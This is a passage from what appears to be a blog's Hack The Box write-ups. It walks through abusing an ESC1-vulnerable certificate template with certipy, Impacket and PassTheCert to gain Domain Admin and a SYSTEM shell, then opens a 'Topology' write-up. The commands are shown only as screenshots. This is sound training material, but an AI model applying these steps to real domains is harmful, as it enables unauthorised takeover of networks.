url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsSAAALEgHS3X78AAAByElEQVR42m1S2XaiQBDlU+YkxgUEZIeGblBAUDRqFucl//8bN1UNJvMwD/dUV52uW7cWY5HdMBd3WNkJoTqgHj7Rnv9iePtCe7qj6m6Q+ytke4EdKFi+xDqQWG1yvGwymH4xxQssnAyGJ3qs4wZuXMNNavhZi0j2GoHYw422mNPH1aaA6eWaiC0nvzgplhsBi3yT4nM7hZGqI0RF6vJO26jokZYDZHPBypP4swwxsxLMzBjPZqTB75k1YYrpOPkGJzISNaDav6GoX7W/7d/hpQ2pE/QxpYSRgBOfVuE/JL+EDENsz3ig2L2SPUG1V+Tks1IxWW7fofadqERcdDRHpVtc6HGMo1i6YlSYUauyuZK6C5rjfXwTuSK7O3ygPn6O6nXBAc3wgXw30JhaKtTADksNLmIEyY4q9ghFp+fHS8lIEc+WEVA8JhvLA4JsP/1ltRUtrCKicfPsT4RbeHQGCROUg14Ob5yJWTETrYOS2ik0Fg5vVML2y58zYuuQQn4bVfeOuruias7gd86ttjfd9qMAg2fopS2dSUFnoohQ6VOx+Jx4hu4Ig9vgBD+tdTt2WOnt8lzZZ5IHqUd3+mwmeFrGtGna6n/wDSfVTXI9M1KBAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="certipy find" title="" src="/static/c7ff88fb2ccf79b0fe3b79b10e3920f3/50637/certipy-find.png" srcset="/static/c7ff88fb2ccf79b0fe3b79b10e3920f3/dda05/certipy-find.png 158w, /static/c7ff88fb2ccf79b0fe3b79b10e3920f3/679a3/certipy-find.png 315w, /static/c7ff88fb2ccf79b0fe3b79b10e3920f3/50637/certipy-find.png 630w, /static/c7ff88fb2ccf79b0fe3b79b10e3920f3/a9fc9/certipy-find.png 701w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">certipy</code> found that the CorpVPN template had an ESC1 vulnerability:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/9da5a9dca52dad4c96b204be17ddf2e9/0df09/vulnerable-template.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 122.15189873417722%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAYCAYAAAD6S912AAAACXBIWXMAAAsTAAALEwEAmpwYAAAERUlEQVR42m1V2ZLaSBDkP/YwIARIQkL3fQtxHwMzduzGhMP//xXp7AbPDo59qCiBpOyqzKzSQDEiTMwYVtAwajhxK7MbdzD9CqO5J38fbu+o1xesDt/QH7+iWr+g6s/Q7AwTI3xEgIG6SDCzUhnzZQpVHKAHzKEMcW04OarVBX7aw8/XSJsDAmYRhls8A06MGEl3Qb6+IutfMHdLTO0cqpVgTPCRHsLwa9S7V0TFRh6gaAzmsebL+A8wZIV6hE2xw6bcIiNYGdaoohaBGcHRPNhzF7lfYF1tSUGJOVsc80VlET0BfQBOCXjK1rjUe5zyDdZhg5ychuQumrkIpzZaN8c+7TCdOlD535T3RPwv4IwtX5ojLrs3HMnTqtiiTnokrNaa+7BmHrKgwq49oPAKGSUrrZwMFtseMQQNTy3HXomElcXkKmI4ZgpTcEeudAJGvH/c3fBCdfv2iLbaoat38KIas+VdzA9ARY9hRh1sVmWFHZbxihzFGGmhFGXIbHg1yvUNBW0SVXs+0/L5TtpJWEtwq34Asopl0NJ3K+YGNkHnFoknkMLqx/OQL9QoSEf5sI4EYtUjVv+70oPRxMJw6mI4CzAkZ8OZf6/uATia04dehWb7hpz2ajY3JBTQJkWGU0AVauufRBEVTmgN4UfVTCCM/isEqABcsOVm84qGPs3aM0K6QYBJQOMB+IjBnBz+yHq8pyu8ZyLW+E4D36jihpV3ioWzFeNKbxqsWBGH8XCFbcpiPoFJwBkfutIq1/qAK9U7ErCheTuOm4hIgC4zNOkamlN+UCHaU38Dk4DKzOHYvaDYf0NCJXWKM6M4Q1rnDy3Cn3xZZctBc8KEYv1Fjv8mDffw5WgqnwGFUi4n4ZWWONJjfb7FntXGrGo59Rg+ArYpxjElZwUPK6i6GNOClvHJ4fRT64MxOVR5asCxCslLvOCyoDgBH/JZgaM6yGjct+0r9qTm1J5w6c7YlzucqHbBbfMMSJ8ZToWYVVkhifcbmGzbJmdTVvRFtGwX8Io9rMf/drqRw7CgdRQe/tSyAFSNhGNEYxNQWERksXCFlYRtLBr/9PaDC/bK5foPtud/pY3Eb7FgnwAVEq+ybcO++0pjFqA6r3/50GTVh9t3uWTb3TdsT3fAZnOVU/PZPoORJiyQyHmVwZd1km5yBDW3wheC6vyvI0hKUxeclHr3FVn3goR8TineWL/PvcgDgyO35EvuIoXLz4BHa9gURmwckTXVhc8NfuJ6aylET9Dt6iyv23LDexkWdIoInSIOQl7E5K+Ie8TkKmB1Pgff4Gkm7WKRdHuZo6SdcppeRM2Nk3FJ5Jwul4fZ/Fy4VDtiHmSsok44HVxfYhoichjxZsgHI/IY8zrlIT1BSn4JI/ovp2gZucvoQ4/LweHUuNzyvi4+UhQk5xSICLMtiY0+xkthHkpR+J3pr3K9CZGEMxSZxep6fLQe8RPTFQww77UMSwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="vulnerable template" title="" src="/static/9da5a9dca52dad4c96b204be17ddf2e9/50637/vulnerable-template.png" srcset="/static/9da5a9dca52dad4c96b204be17ddf2e9/dda05/vulnerable-template.png 158w, /static/9da5a9dca52dad4c96b204be17ddf2e9/679a3/vulnerable-template.png 315w, /static/9da5a9dca52dad4c96b204be17ddf2e9/50637/vulnerable-template.png 630w, /static/9da5a9dca52dad4c96b204be17ddf2e9/0df09/vulnerable-template.png 707w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The template above is vulnerable due to the following configurations:</p> <ul> <li> <p><code class="language-text">Client Authentication</code> : <code class="language-text">True</code> - an issued certificate can be used for client authentication purposes.</p> </li> <li> <p><code class="language-text">Enrollee Supplies Subject</code> : <code class="language-text">True</code> - a Subject Alternative Name can be specified which allows a certificate to be requested as another user on the system (e.g., <code class="language-text">administrator</code>).</p> </li> <li> <p><code class="language-text">Requires Manager Approval</code> : <code class="language-text">False</code> - a requested certificate doesn't require approval from a user with certificate manager permissions.</p> </li> <li> <p><code class="language-text">Authorized Signatures Required</code> : <code class="language-text">0</code> - no authorized signatures are required to sign the CSR for the CA to accept it.</p> </li> <li> <p><code class="language-text">Enrollment Rights</code> : <code class="language-text">AUTHORITY.HTB\Domain Computers</code> - this gives low-level users the ability to request a certificate by simply joining a computer to the domain.</p> </li> </ul> <p>So, first I used <a href="https://github.com/fortra/impacket" target="_blank">Impacket</a> to join a computer to the domain:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4cea08e808b10b9a4a0d58cba9c82096/a9fc9/addcomputer.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 16.455696202531648%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsSAAALEgHS3X78AAAAtElEQVR42iWOWXKDMBBEuYuxXY5AFgixCoxkeYn5TO5/lZcp8vGqp3tqajo7mJnz9IPyv+TuRRs24mMjpI2UPsT4zbo+WcIb03hU6Sh0y0n3HGuPbgO6uXGynrP4THcrdogMgyz6hJ6eNMubekwMU2TykXFOGLeiqhnbRyqZy3qhsDcu15FcdeTFP1lpV/kguCgETCsHXeIqvty5Y8cXVf+gbMKupovUneRSQBnP4eLIv9qdPxmuYspA7uvmAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="addcomputer" title="" src="/static/4cea08e808b10b9a4a0d58cba9c82096/50637/addcomputer.png" srcset="/static/4cea08e808b10b9a4a0d58cba9c82096/dda05/addcomputer.png 158w, /static/4cea08e808b10b9a4a0d58cba9c82096/679a3/addcomputer.png 315w, /static/4cea08e808b10b9a4a0d58cba9c82096/50637/addcomputer.png 630w, /static/4cea08e808b10b9a4a0d58cba9c82096/a9fc9/addcomputer.png 701w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I requested a certificate with <code class="language-text">certipy</code> as the newly created machine account. I specified the certificate authority, dns name, CorpVPN template, and supplied the user principal name of <code class="language-text">administrator@authority.htb</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/bc5f4676b0d5bed6b79f560db93f7cd0/9a68b/req-cert.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 27.21518987341772%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA80lEQVR42m2PW26DMBRE2Uob2oYEAjYYY5v3o4GQtnT/i5lem6hSpX4cja5kHc94TC9IqxWhmnDRE3g1w0wbRHND0X1AjV9I6wWm/4Rq78jMFaHoEGUtzqzCMdZ4SQwCViLkFbwkHyD0O5js3SNO4ozuWA5IKUPe4BDkjmebJ+l4Ogq6d/wHB8ITZkY9fhMbVHOHrG8Q5ezEqb4ipg/fLtrxGlkU/HNBWHH+i//Ak+WCethQ0iTT7bNUs1KuKCgTasqLEYKmJnIEKyacaOre9q/MCSPegokBdnqc907gJGp0t50cJJVrGmUdYtHjzOt/21nhD5D3otHX93ZrAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="req cert" title="" src="/static/bc5f4676b0d5bed6b79f560db93f7cd0/50637/req-cert.png" srcset="/static/bc5f4676b0d5bed6b79f560db93f7cd0/dda05/req-cert.png 158w, /static/bc5f4676b0d5bed6b79f560db93f7cd0/679a3/req-cert.png 315w, /static/bc5f4676b0d5bed6b79f560db93f7cd0/50637/req-cert.png 630w, /static/bc5f4676b0d5bed6b79f560db93f7cd0/9a68b/req-cert.png 698w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>When I tried to authenticate with the certificate, I received a Kerberos session error:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4a29f39f2c2610db12cba0c48445b2a8/a9fc9/auth-kdc-error.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 20.253164556962027%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA2ElEQVR42k2P2VLCQBRE8y0iRRYISZg9uyEYTEDxyVL//zfadvDBh1N971RNn5kgFAM25p3csNXP0P2C6e0L8+0b0+snxuUDpnmBqs8IswqrSGOVkPgX5VlzXzMfSZDKI3I3Ya+PyNSAlJRPVzgW225B2V8Q5zU2qfMlD5H6h7wTCoqkJxB2RMVLrp3hWGDbBQd7wk50lAzIDEXMwoy+ONyXiLN7+jmvkPA8yrhTGthmRs0XGaZwJ2h+z7C8oEhxltWZghFJ0ZAW20OHVPZ/e+PnnMKdaH3xD1v9g9J88n7uAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="auth KDC error" title="" src="/static/4a29f39f2c2610db12cba0c48445b2a8/50637/auth-kdc-error.png" srcset="/static/4a29f39f2c2610db12cba0c48445b2a8/dda05/auth-kdc-error.png 158w, /static/4a29f39f2c2610db12cba0c48445b2a8/679a3/auth-kdc-error.png 315w, /static/4a29f39f2c2610db12cba0c48445b2a8/50637/auth-kdc-error.png 630w, /static/4a29f39f2c2610db12cba0c48445b2a8/a9fc9/auth-kdc-error.png 701w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>This was most likely occurring due to an issue with smart card logon.</p> <p>As stated in the <a href="https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4771" target="_blank">Microsoft Docs</a>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6198789cf91d5ae16498ac6f7da01c8e/331a7/microsoft-docs-KDC_ERR_PADATA_TYPE_NOSUPP.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 28.48101265822785%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAA7DAAAOwwHHb6hkAAAAwUlEQVR42pWRyQ7DIAxE+/+/mSYsETRsgVQhU+Msh0qtWksjjw88G/uWUsI0TXDOIYQAR76Ugha1rlBSQAwC1lrMOUMpBaVH6HGElJJENWnUGjFF3NrDbdtw5tMzcF2hlYYxhptlAg5iYJAmQAM1z01Iy/LcgZ+iwUtZrroBGcAQeUx4iIHlO/A9cp55EkkwYw0SfTHGXSFEbvg3UAqFrutw7/trhy33VHvvfgOee83zzDBrHwiRDug9QTwftPlaK17O1dCd5oOSNAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Microsoft Docs KDC_ERR_PADATA_TYPE_NOSUPP" title="" src="/static/6198789cf91d5ae16498ac6f7da01c8e/50637/microsoft-docs-KDC_ERR_PADATA_TYPE_NOSUPP.png" srcset="/static/6198789cf91d5ae16498ac6f7da01c8e/dda05/microsoft-docs-KDC_ERR_PADATA_TYPE_NOSUPP.png 158w, /static/6198789cf91d5ae16498ac6f7da01c8e/679a3/microsoft-docs-KDC_ERR_PADATA_TYPE_NOSUPP.png 315w, /static/6198789cf91d5ae16498ac6f7da01c8e/50637/microsoft-docs-KDC_ERR_PADATA_TYPE_NOSUPP.png 630w, /static/6198789cf91d5ae16498ac6f7da01c8e/331a7/microsoft-docs-KDC_ERR_PADATA_TYPE_NOSUPP.png 842w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There's a useful tool that accounts for a situation like this by providing a way to authenticate against an LDAP server with SChannel: <a href="https://github.com/AlmondOffSec/PassTheCert" target="_blank">PassTheCert</a></p> <p>To use <code class="language-text">passthecert.py</code>, I extracted the cert and key from the pfx with <code class="language-text">certipy</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 591px; " > <a class="gatsby-resp-image-link" href="/static/81249dafb043bb306c9251299b9084d0/3d4ad/extract-key-and-cert.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 33.54430379746836%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABaklEQVR42lVQWU/CQBjsX4FiD0rP7UEvoC09MFyCNgImauKD8f+/j98uaPRhMtvtZi5J9loM2RZ3/gaKV8DPO5SrJ1SEZv2MsnsUSIsNsnqPpKR3dgqNoNoZNIvYSqCYU4zGISR3doCZbuGkawT5Cm7WotldsO/fsOvf0W7P2BxfwZIGRlzBCAsyzsHiGk60hBtVsMISE28GWQgGBRyWwbBjmGxBP+bQyVkxE4yMqeAJ3fNEPA3/5jzQAgz1EAOd8xVCUHdLjP0OOquhUWWHHP2kFe78zNmjdCypEaQdJWtERSH4I6r5fwTTI9T8AiPrqe49wmKN/ekD57cvnAhHOvcvn5i3D0i6A5J6R5Vnv8a8ssfrU23VjCEF4nIJy1/ADSuYNAFLW3hTSpR1xEuEtK1KNWWaYEgp5NsU6m0C1YqJY5oogmTTPk5QwQ5KEi3FjiaJ88cWidvkbPrXKXgaZRJD1iNR9Yr/G34D6znnxABdTj0AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="extract key and cert" title="" src="/static/81249dafb043bb306c9251299b9084d0/3d4ad/extract-key-and-cert.png" srcset="/static/81249dafb043bb306c9251299b9084d0/dda05/extract-key-and-cert.png 158w, /static/81249dafb043bb306c9251299b9084d0/679a3/extract-key-and-cert.png 315w, /static/81249dafb043bb306c9251299b9084d0/3d4ad/extract-key-and-cert.png 591w" sizes="(max-width: 591px) 100vw, 591px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I was able to use the cert and key to run the <code class="language-text">whoami</code> action to verify that the certificate was for the <code class="language-text">administrator</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/866d77ab98b10af4cc566d5b560d71d0/a9fc9/whoami.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 17.088607594936708%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAvElEQVR42h2O63KCMBCFfZbWBsVLQoAAhVAuAWu1depY3/9Nvob8OLOz5+x8e1aR+kDkNzbmTlZ/M52fuNMD2/9Qddew68KxjkuSfESmA0fdEUvLelchsxFtpuDvk46VaS7o9kphL4zzw8P+cJ9PTPvFu4cO853O/ZKWM0V9Do9qf59XJ6RxpMWEygYP7DksQKksKrEcZYP2wV62xIeGxH9Ml0a+jcp6orjiNTIIP9+2ZZDYek8YXkQetOT/HKpj1y5jxAAAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="whoami" title="" src="/static/866d77ab98b10af4cc566d5b560d71d0/50637/whoami.png" srcset="/static/866d77ab98b10af4cc566d5b560d71d0/dda05/whoami.png 158w, /static/866d77ab98b10af4cc566d5b560d71d0/679a3/whoami.png 315w, /static/866d77ab98b10af4cc566d5b560d71d0/50637/whoami.png 630w, /static/866d77ab98b10af4cc566d5b560d71d0/a9fc9/whoami.png 701w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I spawned an LDAP shell and added <code class="language-text">svc_ldap</code> to the Domain Admins group:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b696c55bcd1697c01d1108a69a4a7eb7/d7de0/ldap-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 36.075949367088604%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABYklEQVR42mWR2VaDQBBE+ZUssiQsYYdh2JJATCCLOerxQf//M8oajL74cE83zUx1Tbe2SnpY8g1m+Q7Zv2K8f2G4faI+3BG3A7rzB0Q7wvJLmEGFrBqQlEdEoocdNdBZz5uR9RP8rIMmmgsyFjzRIa8HiHpEtbsikgf4xWH6V+5uSKsj7LBGLI8I8g5+uocbb6G7BYwJAd3Jodl+DS9q4QQ1bL+C5Ul4PBjwgm7nmFsJFqv0j+U6e5DiiVHVZmYynVNoUd4jU12zPUJ2jsSBsUcin+mGOb9VvtrIqZnhCCzM6B9zFa34RzCnYKIukjjnMymwoUsvbOAS9QLLlTCdgq4FZkZMIhJi8WCuB8SHVjRntN0Lmu6GantBub2i3t9QcJbKeSpPzM+I2WxFhwp3Go+EQ9c6nzxXgpMoBQW3tuVGJYXLh6BqItvzVPvN1aJCzjVIdlhvysmpQZZm/BBTDkN8Azbq5ucgvaYhAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ldap-shell" title="" src="/static/b696c55bcd1697c01d1108a69a4a7eb7/50637/ldap-shell.png" srcset="/static/b696c55bcd1697c01d1108a69a4a7eb7/dda05/ldap-shell.png 158w, /static/b696c55bcd1697c01d1108a69a4a7eb7/679a3/ldap-shell.png 315w, /static/b696c55bcd1697c01d1108a69a4a7eb7/50637/ldap-shell.png 630w, /static/b696c55bcd1697c01d1108a69a4a7eb7/d7de0/ldap-shell.png 705w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">crackmapexec</code> confirmed that the <code class="language-text">svc_ldap</code> user now had administrative access:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4fe52d5aabb3e3d7cb3e283220e63b51/c251d/verify-svc_ldap-da.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 47.46835443037975%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsSAAALEgHS3X78AAAB60lEQVR42iWSWW7bQBBEeY8AgR2tpLjPxp0mZVuyJdiyEyQBEuQnuf8VXnrkjwaJ6WF11WsGK/3I0r6yqt+Jq0emhwvT4zv75+90+1fa6URS1CzjiijvSMqWOK/lrGGbtYRlzyapWUt/IxXk0y+y+omyPzMevnF3/Eo9nqikbP/M8eUHzXAktXvcfGE+vGHbB0y9p6ju0f1BnnuUVGYmgsieyNOSThUUuidRIxuZvM06QnFkh2eiYmQRWhbSi+09uVQmA6Jykrvd1bm/v0kagkX3jy+hIy46xvlM693Ih366r/eff7Hdkc8bzf1QMTYd62zAuY7L5JhdyWonvbpAF4pAN2dWkeRPO8pG7NuJbfLBKyoGmrszu3LkdmuplCZNNZ/Wljj1IiWNMSwiy1QpTGkITH0i3Dmx20oUz2G+CoYeuIjWIhirO0lhKQpLnlvSzKIKw1xpJqdZ7yxJaghjEQzbP9xsa3E00E0vVIPfai+M5ms9XX5fo99sDE+d5rVXOGUYRehtVIzWyHZlWK7FtQjm5kAUO6K0IRV3Hw7bq0MP2gi/UAZ4h0ZZGm24Fea71DKIaClOv0jk1ihJoAmUO1LLxEz+q0SLoBKGqRf82JxfiGfpGToRU8LpZuvIJLaW92XkWO48XyU4DP8Bt1MmUUzZWTwAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="verify svc_ldap is domain admin" title="" src="/static/4fe52d5aabb3e3d7cb3e283220e63b51/50637/verify-svc_ldap-da.png" srcset="/static/4fe52d5aabb3e3d7cb3e283220e63b51/dda05/verify-svc_ldap-da.png 158w, /static/4fe52d5aabb3e3d7cb3e283220e63b51/679a3/verify-svc_ldap-da.png 315w, /static/4fe52d5aabb3e3d7cb3e283220e63b51/50637/verify-svc_ldap-da.png 630w, /static/4fe52d5aabb3e3d7cb3e283220e63b51/c251d/verify-svc_ldap-da.png 751w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Finally, I used <code class="language-text">psexec.py</code> from Impacket to login as <code class="language-text">svc_ldap</code> and obtain a shell as <code class="language-text">nt authority\system</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 587px; " > <a class="gatsby-resp-image-link" href="/static/dbc16a5ea60fed19aec893bb49e516dd/0ef32/system-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 64.55696202531645%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACF0lEQVR42oVT2Y6bQBDkS5Jde33hC+zhGI7hNNgYH+tVon3I//9GpbtjRYpEtA+tHgampqqrsN62CcbqjLH3kD5zU8SmRVpdYQ7vyNsP6Ul9w4Leje0Ak5XG69yTGs39Z/cwXviw1lGHjbljnd7gpBdE5RV5Q0DNA+3lU8Da6yeq7ifK4wfC7AwVt1irQmq1z6hyWc82ESzHr7DTNWwnwWwdYSoVY07MJ2stbGwnlf3lLsOC1vwdg6zo2SbWvMffCKCftKjbO5Kix15XCNITVNTA8WtEeY/AkAKvkMMMPloEGNn+U7JPz/+WpfQBWdGhbO4o6x5FdUZWXURe9/4LGUnnm5kFz++rsvbRCTExSas7NM0nzs+I0gaayvULYchzY+ZuWAv42zL8P+AubBHRAQaMiyvi8gZtTsJSBSU2KqcZNyJ7tokFTFwleYOAobmgaCga9QM1OckSTX1HTjHJG76kJ4d/iMualLAZWwYnY4ZArZWbQ+mWDGkhjocHYlXSXoOtyoTVlNxeukYctakzKO8NAjqqQshzMj28qKU59sSgxNIxmK4CfJ8qvMw8KvVc7/FtshfZg5L54C6o4XgVNnSzE3AmjUhiRjw73uPgstStX5KaRnI3yND1KG/ESpuz9JB6kJwQph3lkIyJjvCSIxlz+PuHcOg56IMMVdgImEcHGUSzfOph0lFUOnjxEYvtnzkyyFcu/wbsraj9JOFdwQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="system shell" title="" src="/static/dbc16a5ea60fed19aec893bb49e516dd/0ef32/system-shell.png" srcset="/static/dbc16a5ea60fed19aec893bb49e516dd/dda05/system-shell.png 158w, /static/dbc16a5ea60fed19aec893bb49e516dd/679a3/system-shell.png 315w, /static/dbc16a5ea60fed19aec893bb49e516dd/0ef32/system-shell.png 587w" sizes="(max-width: 587px) 100vw, 587px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-topology/https://mgarrity.com/hack-the-box-topology/Thu, 13 Jul 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/2b18bfa5b739c4d7e561d461b8f2d641/3b67f/topology.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABBElEQVR42p2SwUrDQBRF8wktxphok9KYSJxJaqO0UJFg01pdhYAuXIiK4EYQ3PQrBJHiXveC4NafO06wumqjcfF4MPPmzL2Xp+m2ZGE5kqU1Qc0QqkuWnZLZWWmLLorHdVNguBFet43lblIzf4dqZTC/t0V2LhnnHdLLhKAbUbfKoXOBhb1VLyQ5jcmzhJf7EaPHKYOrXayWst+oAlS/F9a8WDC82Gf49MHD6zVHz+9sH/fxY1mqcr5CpcBoBmS3KQfTNyZ7dwiRk55JTLddUeEsw0KlvxMyvhnQP5SkJ002eh11Lqpn+ANV1gw7oBVHrKx/wXTnn2vzDdXtUGWmQI2/7eEnioUDQ9mt1EAAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Topology" title="" src="/static/2b18bfa5b739c4d7e561d461b8f2d641/50637/topology.png" srcset="/static/2b18bfa5b739c4d7e561d461b8f2d641/dda05/topology.png 158w, /static/2b18bfa5b739c4d7e561d461b8f2d641/679a3/topology.png 315w, /static/2b18bfa5b739c4d7e561d461b8f2d641/50637/topology.png 630w, /static/2b18bfa5b739c4d7e561d461b8f2d641/fddb0/topology.png 945w, /static/2b18bfa5b739c4d7e561d461b8f2d641/3b67f/topology.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Topology is a Linux machine hosting a website with a PNG image generator based on LaTeX inline math mode commands. This feature can be exploited to read arbitrary files on the server, resulting in the exposure of a password hash for a user that can then be cracked and used to SSH into the box. Once on the machine, monitoring system processes can lead to the discovery of a cronjob that executes any <code class="language-text">.plt</code> scripts within a specific directory using gnuplot, this automated task can be leveraged to obtain a root shell by writing a malicious script within the specified directory.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" 